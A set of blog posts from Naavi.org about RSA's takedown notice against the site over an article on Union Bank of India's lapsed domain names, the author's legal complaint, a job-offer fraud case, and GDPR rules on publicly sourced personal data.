Naavi.org

In continuation of the report of the incident of illegal blocking of Naavi.org on 17th January 2021, I would like to inform the readers of Naav.org that Union Bank of India has expressed regrets for the incident. A senior executive of the Bank called yesterday evening to express his regrets on behalf of the Bank.

However, so far there has been no response from RSA.COM

I have therefore raised a complaint with CERT-In today as follows:

Quote:

To

Unquote

I am looking forward to the action to be taken by CERT IN.

Naavi

Today, I woke up in the morning to see the following email from my hosting service provider

The Email suggested that a Phishing Script has been hosted at www.naavi.org in its article on Union bank published on January 14, 2021 (second article) and a complaint had been received from RSA security.  The service provider had disabled not only the article page but the entire website www.naavi.org.

Old followers of Naavi.org are aware that long time back, one of the articles of Naavi published on a blog site (www.bloggernews.net)  had been blocked which attracted a wide discussion on “Censorship” by the Government. That was in connection with an article on Zone-H.org website  on which some comments had been made by the owner of Zone-H.org which was found unpalatable to a company in Hyderabad and the MeitY had blocked the article and the entire blog site as a mistaken implementation of the “Contempt of  Delhi High Court order”.  It indicated that MeitY (It was DIT at that time) had not applied its mind in issuing the blocking order. Subsequently the blockade was removed. Even before this, Naavi had also taken up another case when Meity had blocked the entire Yahoo Groups for blocking one group in Manipur.

Now  a similar incident had arisen in the morning with RSA sending a notice to my service provider Squarebrothers.com which is a Chennai based hosting and internet service provider with whom I am having a nearly 25 year relationship.

The RSA notice copy of which is given below made some accusations which need to be re-iterated.

RSA in its message sent to Square Brothers, stated

“RSA has been made aware that you appear to be providing Internet Services to a site, which is abusing Union Bank of India’s brand. This site hxxps://www[.]naavi[.]org/wp/union-bank-of-india-should-learn-to-protect-its-digital-assets/ not only violates Union Bank of India’s copyright, trade marks and other intellectual property rights, but may also become a host to a phishing attack, or other fraudulent scams against Union Bank of India and its clients.”

It went ahead and branded naavi.org as a fraudulent website stating

“The fraudulent website not only represents a misuse of Union Bank of India’s intellectual property; its purpose is to mislead the Union Bank of India clients. Our experience has shown that such sites become a host of phishing** and other fraudulent scams against the bank clients.”

RSA then directed Square brothers

“Please take all necessary steps to immediately shut down the fraudulent website, terminate its availability to the Internet and discontinue the transmission of any e-mails associated with this website. We understand that you may not be aware of this improper use of your services and we appreciate your cooperation.”

I would like to state that the RSA Security team which has drafted this message must be some kids who donot know that Naavi.org is a website which has for over 22 years has been providing services for fighting Cyber Crimes and Phishing.

The message started with the words

“RSA, an anti-fraud and security company, is under contract to assist Union Bank of India in preventing or terminating online activity that targets, or may potentially target Union Bank of India’s clients as potential fraud victims.”

The trigger for this development was the article in which I pointed out that Union Bank which took over Corporation Bank and Andhra Bank had abandoned the earlier domain names of the two Banks. By doing so, and deciding not to invest Rs 800/- per year per domain to protect the digital asset, they would be losing the traffic to the website which would continue for a long time. This is the valuation aspect I have discussed in detail in the said article.

More than this exploitation of the traffic, I was concerned that the domain names would soon be registered by fraudsters who would be committing phishing frauds on the erstwhile customers of these two Banks.

My intention was to warn Union Bank that any such phishing would result in a liability on Union Bank. I was also highlighting the need for valuation of digital assets and bringing it into the books of account.

It is unfortunate that Union Bank nor the RSA team has read the article and understood what the article contained. Instead , RSA jumped to the conclusion that Naavi.org itself was a phishing site. By doing so, they exhibited their utter inefficiency to protect the Union Bank interests. Instead of shooting the thief, they were shooting at the guard.

By their action, RSA caused “Denial of Access” as for as Naavi.org was concerned, which is an offence under Section 66 of ITA 2000.

According to ITA 2000, Section 69, Government has the powers of blocking websites for which there is a process and the authority remains with the Home Secretary. Any other person blocking a website would be an unauthorised act which is punishable under Section 66 of ITA 2000. Civil liabilities can also be claimed under Section 43 of the Act. The Supreme Court judgement in the shreya Singhal case has also reiterated that intermediaries under Section 79(3) can only delete content on the basis of a Court order.

However, RSA arrogated to itself a judicial verdict that naavi.org was a “Fraudulent website” which is a defamatory statement. This was contrary to the Supreme Court verdict in the Shreya Singhal case.

Unfortunately, the service provider, in this case M/S Square brothers acted on the illegal notice from RSA and took down the website.

( Immediately after I pointed out to them the mistake, Square brothers not only re-instated the site, but also called me up to apologize).

In such cases it is necessary for service providers to raise a ticket, call for the views of the accused and take a decision.  Naavi.org has given an earlier suggestion on how to handle “Rogue Websites” which could be adopted into the Incident Management System and the Grievance Handling mechanism of intermediaries.

I presume that after I wrote the article on Union Bank, it would have rightly attracted the attention of the CISO at Union Bank of India who would have, again not understanding fully what I wanted Union Bank to do in the instance, forwarded a mail to the RSA Security team saying perhaps…. “Please respond”.

The idiotic kneejerk response from RSA was to declare that Naavi.org was a fraudulent site, hosting a Phishing script and asking Square Brothers to block the site and also directing them

” We specifically would ask that you also take the following actions (if relevant or possible):

* Please provide us with a tar/zip file of the source code for this site, so that we may analyze it to help prevent further attacks.
* If any customer data has been captured that is stored on your systems or equipment, please send us that data so that the customers to whom that data relates can be notified and take steps to protect their credit.
* Please provide a copy of any records you maintain that indicate the name, contact information, method of payment or similar information that may be useful in helping learn the identity and location of the customer for whom the website has been operated.

Thank you for your cooperation to prevent and terminate this fraudulent activity.”

The RSA Communication was signed by Anti-Fraud Command Center
RSA Security, LLC.
UK Phone: +44-800-032-7751
US Phone: +1-866-408-7525
CA Phone: +1-800-406-8651
E-mail: afcc@rsa.com<mailto:afcc@rsa.com>
www.rsa.com<http://www.rsa.com>

The footnote to the RSA letter stated

“**”Phishing” is an e-mail scam that attempts to trick consumers into revealing personal information-such as their credit or debit account numbers, checking account information, Social Security numbers, or banking account passwords-through fake Web sites or in a reply e-mail. As described in the letter above, the fake web-site through which the fraudster is attempting to collect Union Bank of India’s customer data is under your responsibility.”

I wanted RSA to let me know where is the “Fake Website”, Where is the “Phishing Script” in Naavi.org and how Naavi.org becomes a “Fraudulent Website”.

On the other hand, I can call RSA as a fake Security services provider who cannot be trusted by the Bank. By their current action, they exposed both Union bank and Square brothers to legal action for defamation and the violation of several sections of ITA 2000. Having  a security agency which does not know its legal obligations is a risk for Union Bank and I request Union Bank to revise its contract.

In case RSA has identified this,  as a “Phishing Incident”, I want to know if they have notified CERT-IN and RBI about the potential security breach. If not, is it not another failure of their security service?

I also request RBI to examine this incident and advise banks not to appoint blind and un informed security agencies even if they carry the tag of “RSA” if the persons managing the “Command Center” donot know the difference between “Phishing” and “Reporting a Phishing possibility”. Most of RSA work is what they may call “Ethical Hacking” while we can call as “Potential Black hat hacking”.  Such an agency passing its views on Naavi.org is like devil calling an angel as a fake.

I sent out a detailed e-mail to all the concerned persons today morning , immediately after which I got the response from Square brothers. But neither RSA nor Union Bank has come out with an apology for their unwarranted reactions and comments.

I look forward to them realizing that when they receive such complaints, they cannot let their robos take “Automated decisions” and launch an attack on a genuine website.

There has to be a human intervention to check if the robotic response was correct. Surrendering to Artificial intelligence and responses is idiotic to put it mildly. Indian law under Section 11 of ITA 2000 attributes such responses to the owners and they can be held liable.

If Section 85 is applied, the head of RSA and the Chairman of Union Bank as well as several other officials in the Bank and RSA are liable to be prosecuted for this action.

I hope that Union Bank realizes the extent of risk that they have pushed them into by the injudicious action by their security advisors namely RSA.

Comments are welcome

Naavi

Reference: E Mail sent to various parties in UNion Bank, RSA, SquareBrothers, Meity

P.S: End of the day, Union bank called to express regrets. Hopefully the Bank will enquire how did RSA was prompted to issue a “Take down order” without verification of the content and expose the Bank and its executives to criminal liability. The Bank has to put in place a system of handling complaints. Bank can review the contract with RSA to incorporate a penalty clause  to ensure that RSA is responsible for such actions. This is a case study to learn  how a Techno Legal incident needs to be recognized and responded. RSA needs to review its service if it has to remain credible as a security provider for Banks.

I thank a number of my friends who responded with suggestions during this incident. One of them pointed out that RSA has been using a similar notice for such incidents since last 10 years by sending me a copy of one such notice. This indicates that RSA is really not aware of its legal position and whether it requires to make changes to its system. I am waiting for RSA to respond. Otherwise a complaint may have to be filed against RSA some time today.

Naavi

18.01.2021

In a classic web based fraud, NDTV journalist Ms Nidhi Razdan appears to have fallen prey to an Internet scam according to which she was offered a position of “Associate Professor of Journalism” which prompted her to resign her job from NDTV.  Subsequently she has realized that the offer was not genuine.

This sort of fraud has been reported earlier also. In a typical fraud, the victim would receive forged appointment orders on proper letter head of a well known organization, there would even be a phone number for contact which would confirm the transactions if contacted. The fraudsters would go through the simulation of all the publicly known procedures that the organization normally adopts for such recruitment. Even the Work permits and Visa would be forged and delivered.

While providing all these preliminary services, the fraudster would collect money. In one of the cases I had come across earlier, a senior Corporate employee getting about Rs 3 lakhs salary per month in India opted to take a better offer from London. After resigning from the job and getting ready to move with his family to London, the person realized the fraud. By that time he had spent more than Rs 3 lakhs.

In the instant case, Nidhi Razdan has not revealed the financial loss she has suffered probably for keeping the information confidential for reasons of privacy. But it is reasonably expected that she would have suffered a loss of at least around Rs 5 lakhs. The financial trail of these payments are the best available means of tracking the fraud.  I presume that the money can be recovered if properly followed up.

What is however important for public to realize is that the fraudsters are so smart and sophisticated that even a well informed person like Nidhi Razdan with several personal contacts abroad who could have helped her check the genuineness of the offer fell prey to the fraud. We should welcome the public awareness being created by this incident and several senior executives seeking a job change would benefit from the knowledge they gain through this exposure.

The frauds of this kind are facilitated because of the natural psychological approach of most such senior professionals because initially they would keep the offer confidential and deal it entirely on their own. If they are financially independent, they would not even inform others even within the family before the loss starts hurting them. They would not share the information with their friends and colleagues because they would like to avoid problems in the current work space as long as possible. Thus until they are forced to submit their resignation, the information would be guarded as a secret.

In the mean time, the fraudster would take fees for verification of documents, arranging Visa and Work Permit etc. The victim would have shared his/her passport and identity details which are some times separately used to get fake identity documents by terrorists and other fraudsters abroad without the knowledge of the victim.

We donot know if any OTP for a Bank transaction is also obtained and a large amount of money siphoned off from the Bank.

I wish this will be a lesson for all job seekers to be careful whenever an “Upfront” payment is involved in such transactions.

Our sympathies are with the victim and appreciation for sharing the details with the public which would be useful for others.

Naavi

[In continuation of the previous Article]

Naavi has been advocating that Digital Assets need to be accounted for in the balance sheets of its owners. Today it is only under the Personal Data Protection Standard of India or PDPSI that a recommendation has been made to companies to bring the digital assets to the books of account.

By not accounting the digital assets in the books of account we have seen that NCLT declared Net4India bankrupt without recognizing the value of around 3 lakh sticky customers. In many web business take overs, mere “Eye Balls” (namely the number of average visitors to a website) have been valued at over $200/- (Read this old article in Fortune).

When Union Bank of India took over Corporation Bank and Andhra Bank, it inherited two websites namely www.corpbank.com and www.andhrabank.com.

Two years back, www.corpbank.com was valued at $503,200 (Rs 35 crores). (see here). According to another estimate it was worth $52000/-. (Rs 36 lakhs) The exact value may not be relevant. But the fact it had a substantial value is not in doubt. Will any prudent company throw away Rs 36 lakhs or Rs 35 crores worth assets?, when maintaining this asset ownership would have cost only around Rs 800/- per year?

Unfortunately, Union Bank of India has done just that. They have thrown away this asset without understanding its value. Similarly www.andhrabank.com also had a value, may be to a lesser extent.

After the merger, Union Bank of India has not renewed the domain names corpbank.com and andhrabank.com. As a result the two domain names have now been registered in the name of net4solutions and godaddy respectively.

Very shortly these domain names will be bought by Phishing scammers who will host websites which are confusingly similar to Corporation Bank and Andhra Bank respectively and successfully cheat the erstwhile customers of these Banks whose accounts will be in the Union Bank.

At that time, a valid argument of the customers would be that Union Bank of India by its ignorance and negligence failed to hold back the valuable trade mark asset of the merged banks and facilitated the phishing fraud.

The possibility of Union Bank of India failing to take note of the Digital Asset called domain names would have less if the balance sheet of Corporation Bank had shown the value of this domain name even at say Rs 1 if not Rs 36 lakhs or Rs 35 crores. Even if it had been shown as a contra entry on both the asset and liability side at say Rs 36 lakhs, the value would have remained visible.

This is the point we made in the case of Net4India.com which NCLT declared as “Bankrupt” when there was a hidden customer value of around 3 lakh X 200 Us dollars, equal to around 6 crore Us dollars or Rs 420 crores.

This valuation would be available if the concern is valued as a “Going Concern” and the value is preserved during the events such as merger or pre-insolvency evaluation. Once this is ignored, the company will revert to a “Gone Concern” status and the value will drop down to zero.

I would like ICAI to consider this and develop a methodology to bring valuation of digital assets (domain names and other assets such as personal data and non personal data) into the balance sheets.

I hereby request RBI to take note of how Union Bank has not only wasted the value of the assets taken over but also will be exposing the customers to a high Phishing Risk, which would be liabilities which have to be borne by Union Bank of India.

The Board of Union Bank of India should also check how they can atleast re-own the two domain names because there is a “Trade Mark” value associated with them which was passed onto Union Bank due to the merger.

The first thing the Union Bank has to do is to serve a notice to the two registrars and restrain them from selling the domain names to any third party. Later, they can file a buy back request and if the registrars quote an unreasonable price, the Bank should file a domain name dispute and recover the domain name immediately.

In the past, Canara Bank had a similar issue when Canarabank.com had been squatted by another person and the Bank without recovering the domain name simply adopted the Canbak.com and continued the business. After this was pointed out by the undersigned, the Bank got back the domain name through a domain name dispute process.

I am personally concerned with the Corpbank.com issue since I was personally responsible for the purchase of this domain name by Corporation Bank, create the content for the Bank’s first website and hosting it at the time they went public way back in 1997. I am also a continuing customer of Corporation Bank who has become a customer of Union Bank of India because of the merger. It is therefore sad if Union Bank does not manage its digital assets and the name corpbank.com (as well as andhrabank.com) is used by fraudsters to cheat the erstwhile customers of Corporation Bank who continue as customers of Union Bank of India.

Naavi

Union Bank of India is considered one of the better managed banks in India and RBI recently merged Corporation Bank and Andhra Bank with Union Bank. Both the merged Banks had decades of history and brand name amongst its customers. 

However, Union Bank seems to be completely unaware of the banking risks in the digital era or it is so poor as not to be able to invest around Rs 800/- on behalf of  each of the merged Banks to protect the interests of the customers of these Banks.

I wish the Chairman of Union Bank of India looks at why I am forced to make the statement that “Union Bank of India will be facilitating Phishing by Ignorance and Negligence”.

(Continued)

Naavi

Many organizations involved in market research often collect data from publicly available sources such as Google Searches, Social media postings etc. This information is processed and some useful market information is gathered. This may also be commercially traded as market research reports.

In the light of the recent discussions on whether WhatsApp can share some of its information internally to FaceBook and whether FaceBook can use it for advertising profiling of the users has re-kindled the debate on how data protection laws need to address publicly available information.

The regulatory authorities can take the easy way out and stick to the exact narration of Article 14 of GDPR that Where personal data have not been obtained from the data subject, the controller shall provide the data subject with  certain information about the collection and the purpose etc., within a reasonable period not exceeding one month.

There is also a proviso that the restriction shall not apply where and in so far as

(a) the data subject already has the information;
(b) the provision of such information proves impossible or would involve a disproportionate effort, in particular for processing for archiving purposes in the public interest, scientific or historical research purposes or statistical purposes, subject to the conditions and safeguards referred to in Article 89(1) or in so far as the obligation referred to in paragraph 1 of this Article is likely to render impossible or seriously impair the achievement of the objectives of that processing. In such cases the controller shall take appropriate measures to protect the data subject’s rights and freedoms and legitimate interests, including making the information publicly available;
(c) obtaining or disclosure is expressly laid down by Union or Member State law to which the controller is subject and which provides appropriate measures to protect the data subject’s legitimate interests; or
(d) where the personal data must remain confidential subject to an obligation of professional secrecy regulated by Union or Member State law, including a statutory obligation of secrecy.

In the context of the above we can re-visit the decision of the Polish supervisory authority imposing a fine of Euro 220K on a company by name Bisnode .

The Company had a total of 7.5 million data records (Personal and proprietary business) and the supervisory authority expected that all of them are duly notified as required. The Company represents that it had to incur a cost of around Euro 8-9 million if proper notices are to be sent which was disproportionate to the cause. There was no issue regarding the quality of security measures otherwise adopted by the company to secure the data.

This incident raises some specific issues which require a deeper debate.

Are the GDPR authorities interested in closing down all businesses which are into market research out of the public information?

Is it not fair to consider that Data Protection is essentially giving a control to the data subject about what information he wants to keep unshared and what information he wants to share. If the data subject wanted the social media information not to be shared, then would it not have been possible for him to set the privacy settings to his posts as “Visible only to approved Contacts” rather than making it open for a search engine to parse the data?

If a data subject has taken a decision not to enforce his privacy settings, is not correct to consider that there is a “Deemed Consent” that the data can be used for purposes consistent with the disclosure as long as no adverse impact on the privacy of the person is envisaged in the processing?

In most of the cases the data may be used for statistical analysis and only part of the data subjects may need to be contacted for further use of the data such as sending a marketing message. In such cases, will a consent request only for the data subjects short listed for further communication be sufficient? is to be explored.

Also, like in the case of WhatsApp obtaining the consent of the data subject to share the data to Face Book and Face Book using it on the basis of the consent obtained by WhatsApp, would it be possible for the social media platform like Twitter to obtain a general consent which includes some thing similar to the following.

“In case the user does not restrict the visibility of the data through privacy setting, the data may be shared with search engines and research agencies subject to no automated decision making on the data subject or direct contact with marketing messages”… etc.

It is time that experts represent with EDPB for a suitable relaxation in the interpretation of Article 14 to include the legitimate interest of market research agencies.

Until such time, those companies which are directly liable under GDPR as “Data Controllers” need to prepare a DPIA and file it for pre-consultation.  If the company is a “Data Processor” then he may depend on the Data Controller to take the responsibility.

In case the data processing is outside GDPR, then there is no need to worry about Article 14 of GDPR. Companies should follow the principles enunciated in the Personal Data Protection Standard of India (PDPSI) for this purpose.

The above is towards development of Jurisprudence regarding data protection.

Comments are welcome.

Naavi